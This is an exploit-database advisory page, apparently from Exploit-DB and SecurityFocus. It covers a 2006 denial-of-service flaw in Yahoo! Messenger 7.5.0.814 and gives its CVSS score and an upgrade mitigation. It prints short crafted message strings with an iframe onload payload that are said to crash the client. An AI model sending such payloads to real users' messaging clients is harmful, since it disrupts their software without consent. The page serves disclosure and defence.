header-logo
Suggest Exploit
vendor:
Yahoo! Messenger
by:
SecurityFocus
7.8
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Yahoo! Messenger
Affected Version From: 7.5.0.814
Affected Version To: 7.5.0.814
Patch Exists: Yes
Related CWE: N/A
CPE: a:yahoo:yahoo_messenger
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Yahoo! Messenger Denial of Service Vulnerability

Yahoo! Messenger is prone to a denial-of-service vulnerability. Successful exploitation will cause the application to crash, effectively denying service. The following examples are sufficient to trigger this issue: s:[space]msg[alt+0160]:---------------------------------------------iframe onload=$InlineAction()>:) msg:---------------------------------------------iframe onload=$InlineAction()>:)

Mitigation:

Upgrade to the latest version of Yahoo! Messenger
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/18622/info

Yahoo! Messenger is prone to a denial-of-service vulnerability. Successful exploitation will cause the application to crash, effectively denying service.

This issue affects version 7.5.0.814; other versions may also be vulnerable.

The following examples are sufficient to trigger this issue:

s:[space]msg[alt+0160]:---------------------------------------------iframe onload=$InlineAction()>:)

msg:---------------------------------------------iframe onload=$InlineAction()>:)

Navigation

Suggest Exploit

Services By CQR